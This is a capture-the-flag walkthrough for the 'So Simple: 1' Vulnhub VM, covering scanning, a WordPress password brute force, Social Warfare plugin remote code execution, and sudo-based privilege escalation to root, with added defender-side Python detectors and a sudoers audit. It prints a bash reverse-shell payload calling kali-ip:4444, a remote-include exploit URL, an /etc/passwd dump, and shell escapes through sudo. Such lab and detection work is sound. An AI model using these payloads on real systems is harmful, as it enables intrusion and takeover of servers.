
So Simple: 1 Vulnhub Walkthrough
MACHINE NAME: So Simple: 1
AUTHOR: https://www.vulnhub.com/author/roel,713/
DIFFICULTY: easy


Here is the description from vulnhub.com

This is an easy level VM with some rabbitholes. Enumeration is key to find your way in. There are three flags (2 user and 1 root flag).

The VM is tested on Virtualbox. After the startup it shows the IP address.

Share your rootflag with me on Twitter: @roelvb79

Good luck and have fun!

This works better with VirtualBox rather than VMware.

Enumeration

nmap -sV -sC -sT 192.x.x.x

Nmap scan report for 192.x.x.x
Host is up (0.00053s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: So Simple
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Since HTTP is open, let's browse to the web server first. The index page holds nothing useful, so the next logical step is to brute force the web directories and see whether anything we know of exists on the server. Let's use gobuster.

gobuster dir -u http://192.168.1.73 -w /usr/share/seclists/Discovery/Web-Content/common.txt
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
[+] Url: http://192.168.1.73
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/server-status (Status: 403)
/wordpress (Status: 301)

And there it is /wordpress. That means we can now scan the running WordPress installation.

wpscan --url http://192.x.x.x/wordpress --enumerate --plugin-detection aggressive

This first wpscan found a user on the WordPress site, but we don’t yet have the password. To get the password let us try brute forcing authentication using a wordlist.

wpscan --url http://192.x.x.x/wordpress -U max -P /usr/share/wordlists/rockyou.txt

Brute forcing the login for max with the passwords in the rockyou.txt list comes back with a valid password: opensesame.
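Both steps above, the gobuster directory brute force and the wpscan password brute force, leave a very recognisable trail in the web server's access log. As an added, defender-side example (not part of the original walkthrough and not the VM's own code), the script below parses Apache combined-format log lines and flags bursts of 4xx responses from one client, bursts of POSTs to wp-login.php from one client, and tool user agents. The log lines, IP addresses, window and thresholds are all constructed for illustration.

```python
"""Rate-based detection of directory and login brute forcing in Apache logs.

Added example for this walkthrough; log lines, IPs and thresholds are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format: ip ident user [ts] "METHOD path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

WINDOW = timedelta(seconds=60)
SCAN_THRESHOLD = 5       # 4xx responses from one IP inside WINDOW (constructed value)
LOGIN_THRESHOLD = 5      # POSTs to wp-login.php from one IP inside WINDOW (constructed value)
SCANNER_UA_TAGS = ("gobuster", "wpscan")   # tools named in the walkthrough

# Constructed sample log: one ordinary visitor and one client that first runs a
# directory brute force (same paths/status codes as the gobuster run above) and
# then hammers the WordPress login form.
SAMPLE_LOG = [
    '10.0.0.9 - - [10/Aug/2020:14:01:00 +0000] "GET /index.html HTTP/1.1" 200 4123 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Aug/2020:14:01:04 +0000] "GET /wordpress/ HTTP/1.1" 200 9876 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Aug/2020:14:02:10 +0000] "GET /.hta HTTP/1.1" 403 278 "-" "gobuster/3.0.1"',
    '10.0.0.5 - - [10/Aug/2020:14:02:10 +0000] "GET /.htaccess HTTP/1.1" 403 278 "-" "gobuster/3.0.1"',
    '10.0.0.5 - - [10/Aug/2020:14:02:10 +0000] "GET /.htpasswd HTTP/1.1" 403 278 "-" "gobuster/3.0.1"',
    '10.0.0.5 - - [10/Aug/2020:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 4123 "-" "gobuster/3.0.1"',
    '10.0.0.5 - - [10/Aug/2020:14:02:11 +0000] "GET /server-status HTTP/1.1" 403 278 "-" "gobuster/3.0.1"',
    '10.0.0.5 - - [10/Aug/2020:14:02:11 +0000] "GET /wordpress HTTP/1.1" 301 312 "-" "gobuster/3.0.1"',
    '10.0.0.5 - - [10/Aug/2020:14:02:12 +0000] "GET /backup HTTP/1.1" 404 275 "-" "gobuster/3.0.1"',
    '10.0.0.5 - - [10/Aug/2020:14:02:12 +0000] "GET /admin HTTP/1.1" 404 275 "-" "gobuster/3.0.1"',
] + [
    # WordPress answers a failed login with 200 and the form again, so count POSTs, not errors
    f'10.0.0.5 - - [10/Aug/2020:14:05:{s:02d} +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 3051 "-" "WPScan/3.8"'
    for s in range(0, 12, 2)
]


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def max_in_window(times, window=WINDOW):
    """Largest number of events that fall inside any interval of length `window`."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect(lines):
    """Return (ip, finding, detail) tuples for scanning and brute-force behaviour."""
    errors = defaultdict(list)   # ip -> timestamps of 4xx responses
    logins = defaultdict(list)   # ip -> timestamps of POST .../wp-login.php
    agents = defaultdict(set)    # ip -> tool user agents seen
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip = rec["ip"]
        if 400 <= rec["status"] < 500:
            errors[ip].append(rec["ts"])
        if rec["method"] == "POST" and rec["path"].endswith("/wp-login.php"):
            logins[ip].append(rec["ts"])
        if any(tag in rec["ua"].lower() for tag in SCANNER_UA_TAGS):
            agents[ip].add(rec["ua"])
    findings = []
    for ip, ts in errors.items():
        n = max_in_window(ts)
        if n >= SCAN_THRESHOLD:
            findings.append((ip, "dir-bruteforce", n))
    for ip, ts in logins.items():
        n = max_in_window(ts)
        if n >= LOGIN_THRESHOLD:
            findings.append((ip, "wp-login-bruteforce", n))
    for ip, uas in agents.items():
        findings.append((ip, "scanner-user-agent", ", ".join(sorted(uas))))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

The user-agent match is the cheapest signal but also the easiest for an attacker to change; the two rate-based checks still fire when the tool is run with a browser-like user agent, which is why they are kept separate.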

After I logged in using the credentials there isn’t much to see so let’s go back to the scan results for the site to look for vulnerable plugins and themes.


Exploit So Simple: 1

It turns out there is a vulnerable plugin installed, Social Warfare. Looking online I see that there is an available exploit.

Basically the exploit does these things:

  • A vulnerability in the plugin's PHP code allows remote code execution, i.e. arbitrary code execution on the web server.
  • A specially crafted payload makes the plugin execute any shell command we put in it.
  • The payload file is hosted on our own web server; the vulnerable plugin fetches it when we visit a crafted URL on the target's web server in a browser.

Let’s try the POC exploit code first to see if it really does work.

  1. Put this into exploit.txt (the <pre> tags are part of the payload, not HTML formatting):
    <pre>system("cat /etc/passwd")</pre>
  2. Start a Python web server to host the payload file: python -m SimpleHTTPServer 8000 (python3 -m http.server 8000 on Python 3)
  3. Then to call the payload visit this URL (the port must match the Python web server):

http://So-Simple-ip/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://kali-ip:8000/exploit.txt

If the exploit works it should print the contents of the /etc/passwd file.

It does indeed. So make a new text file and write in these lines to use the plugin exploit to get our first shell on the machine.

First start a Python web server in the same directory as the exploit.txt file we are about to make.

  1. Start the web server in that directory: python -m SimpleHTTPServer 8000 (python3 -m http.server 8000 on Python 3)
  2. Start a netcat listener on Kali Linux to catch the shell: nc -lvp 4444
  3. Put this in exploit.txt (the port in the payload must match the netcat listener, not the web server):
    <pre>system("bash -c 'bash -i >& /dev/tcp/kali-ip/4444 0>&1'")</pre>
  4. Call the payload by visiting this URL: http://So-Simple-ip/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://kali-ip:8000/exploit.txt
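The request that triggers the plugin has a fixed shape: admin-post.php asked to load options (swp_debug=load_options) from an attacker-controlled URL (swp_url). As an added defender-side example, not part of the original post and not the plugin's own code, the function below inspects a request target as it would appear in an access log or a WAF and reports the host the plugin would be told to fetch from. The sample request targets are constructed; the only real fix for the site itself is removing or updating the vulnerable plugin.

```python
"""Signature check for the Social Warfare load_options request shape.

Added example for this walkthrough; the sample request targets are constructed.
"""
from urllib.parse import urlsplit, parse_qs


def social_warfare_probe(request_target):
    """Return the host named in swp_url when `request_target` matches
    .../wp-admin/admin-post.php?swp_debug=load_options&swp_url=..., else None."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith("/wp-admin/admin-post.php"):
        return None
    params = parse_qs(parts.query)          # percent-decodes values for us
    if params.get("swp_debug", [""])[0] != "load_options":
        return None
    swp_url = params.get("swp_url", [""])[0]
    if not swp_url:
        return None
    # hostname is None for values that are not URLs; fall back to the raw value
    return urlsplit(swp_url).hostname or swp_url


def scan_targets(targets):
    """Return (request_target, remote_host) for every target that matches."""
    hits = []
    for target in targets:
        host = social_warfare_probe(target)
        if host is not None:
            hits.append((target, host))
    return hits


# Constructed sample: two exploitation attempts (one with the URL percent-encoded)
# and three ordinary admin or front-end requests.
SAMPLE_TARGETS = [
    "/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://10.0.0.5:8000/exploit.txt",
    "/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http%3A%2F%2F10.0.0.5%3A8000%2Fexploit.txt",
    "/wordpress/wp-admin/admin-post.php?action=save_settings",
    "/wordpress/wp-admin/admin-post.php?swp_debug=other&swp_url=http://10.0.0.5/x",
    "/wordpress/index.php?p=1",
]

if __name__ == "__main__":
    for target, host in scan_targets(SAMPLE_TARGETS):
        print(f"load_options fetch from {host}: {target}")
```

Matching on the decoded query parameters rather than on the raw string is what makes the percent-encoded variant in the sample count as a hit; a plain substring match on "swp_url=http://" would miss it.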

So Simple: 1 Linux Privilege Escalation

Now that I am running as the www-data user on the So Simple: 1 machine I will enumerate using LinEnum.sh, found here. There are a ton of results, but nothing stands out as exploitable. Let's look around the max user's home directory, /home/max.

Not much is here, but max does have a .ssh directory readable by our www-data user, and inside it are an RSA private key (id_rsa) and the matching public key. These are created when an SSH keypair is generated for a user.

What we can do is copy id_rsa to Kali Linux and use it to connect to the So Simple: 1 machine as max.

Why doesn't that work on the first try? The SSH client refuses to use a private key file whose permissions are too open, so restrict the copied id_rsa to its owner only before connecting.

Now max can run a single sudo command, but not as max. Huh? Right, max can run a command as steven without needing steven's password. Look at the results of sudo -l: max can run sudo -u steven /usr/sbin/service, a standard Linux binary.

This binary starts any service registered on the machine by running the matching init script, and because it runs whatever path it is handed relative to that script directory, it can also be used to open a new bash shell as steven.

Use this command: sudo -u steven /usr/sbin/service ../../bin/bash (or ../../bin/sh)

Now as steven I run sudo -l again to see what this user can run with sudo. There is one entry, sudo -u root /opt/tools/server-health.sh, and steven can run it without root's password.

Only the script doesn't exist yet! So let's create the /opt/tools directory and the script, and put a command in it that opens a new bash shell as root.

Put this in the /opt/tools/server-health.sh script:

#!/bin/bash
bash

Now make the script executable so that steven can run it, then run it through sudo as root.

# make the script executable so it can be run
chmod 777 server-health.sh
sudo -u root /opt/tools/server-health.sh

Running the script through sudo executes the command we snuck in there, which starts a new bash shell running as root, so we are now root.

There's the root flag, so we have pwned the So Simple: 1 Vulnhub machine and our walkthrough is complete.
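Each hop in this privilege escalation chain (the private key readable from max's .ssh directory, the sudo rule for /usr/sbin/service, and the sudo rule for a script that does not exist yet) is something an administrator can check for before an attacker does. As an added defender-side example, not part of the original walkthrough, the script below audits a snapshot of sudo rules and file metadata for exactly those three conditions. The rules, the file system snapshot (including a world-writable /opt so that steven can create /opt/tools, mirroring the walkthrough) and the list of shell-escape binaries are constructed for illustration, and group permissions are ignored to keep the check short.

```python
"""Audit sudo rules and key files for the escalation paths used in the walkthrough.

Added example; the rules, file system snapshot and escape list are constructed.
"""
import re

# user host=(runas) [TAG: ...] command   (standard sudoers syntax)
SUDOERS_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*\((?P<runas>[^)]*)\)\s*'
    r'(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$'
)

# Constructed snapshot: path -> (owner, mode). Paths absent from the dict do not exist.
FAKE_FS = {
    "/": ("root", 0o755),
    "/bin": ("root", 0o755),
    "/bin/bash": ("root", 0o755),
    "/usr": ("root", 0o755),
    "/usr/sbin": ("root", 0o755),
    "/usr/sbin/service": ("root", 0o755),
    "/usr/sbin/reboot": ("root", 0o755),
    "/opt": ("root", 0o777),                  # world-writable, as the walkthrough implies
    "/home": ("root", 0o755),
    "/home/max": ("max", 0o755),
    "/home/max/.ssh": ("max", 0o755),
    "/home/max/.ssh/id_rsa": ("max", 0o644),  # private key readable by everyone
    "/home/max/.ssh/id_rsa.pub": ("max", 0o644),
    "/home/steven": ("steven", 0o750),
}

# Constructed rules: the two from the walkthrough plus one harmless one.
SAMPLE_RULES = [
    "max    ALL=(steven) NOPASSWD: /usr/sbin/service",
    "steven ALL=(root)   NOPASSWD: /opt/tools/server-health.sh",
    "ops    ALL=(root)   NOPASSWD: /usr/sbin/reboot",
]

# Programs that let the caller run something else as the runas user (illustrative list).
SHELL_ESCAPES = {
    "/usr/sbin/service": "runs /etc/init.d/<name>, so a name containing ../ runs any program",
    "/bin/bash": "is a shell",
    "/bin/sh": "is a shell",
}


def parent(path):
    return path.rsplit("/", 1)[0] or "/"


def writable_by(user, path, fs):
    """Owner write bit for `user`, or the world write bit (groups ignored)."""
    owner, mode = fs[path]
    return (owner == user and mode & 0o200 != 0) or mode & 0o002 != 0


def first_existing_ancestor(path, fs):
    while path not in fs:
        path = parent(path)
    return path


def exposed_private_keys(fs):
    """Private key files (id_* without .pub) that group or others can read."""
    return sorted(p for p, (_, mode) in fs.items()
                  if p.rsplit("/", 1)[-1].startswith("id_")
                  and not p.endswith(".pub") and mode & 0o044)


def audit_sudo(rules, fs):
    """Return (user, runas, program, kind, detail) for every risky rule."""
    findings = []
    for line in rules:
        m = SUDOERS_RE.match(line.strip())
        if not m:
            continue
        user, runas, prog = m["user"], m["runas"], m["cmd"].strip().split()[0]
        if not prog.startswith("/"):
            findings.append((user, runas, prog, "not-a-path", "ALL or an alias, not one command"))
            continue
        if prog in SHELL_ESCAPES:
            findings.append((user, runas, prog, "shell-escape", SHELL_ESCAPES[prog]))
        if prog not in fs:
            anc = first_existing_ancestor(prog, fs)
            if writable_by(user, anc, fs):
                findings.append((user, runas, prog, "missing-target-creatable",
                                 f"{user} can create it under writable {anc}"))
            else:
                findings.append((user, runas, prog, "missing-target", "nothing to run yet"))
        elif writable_by(user, prog, fs) or writable_by(user, parent(prog), fs):
            findings.append((user, runas, prog, "writable-target", f"{user} can replace what runs"))
    return findings


if __name__ == "__main__":
    print("exposed keys:", exposed_private_keys(FAKE_FS))
    for finding in audit_sudo(SAMPLE_RULES, FAKE_FS):
        print(finding)
```

The "missing-target-creatable" case is the one that is easy to overlook in a sudoers review: the rule looks narrow because it names a single script, but until that script exists with root-owned, non-writable permissions, the user named in the rule decides what root runs.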

Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.
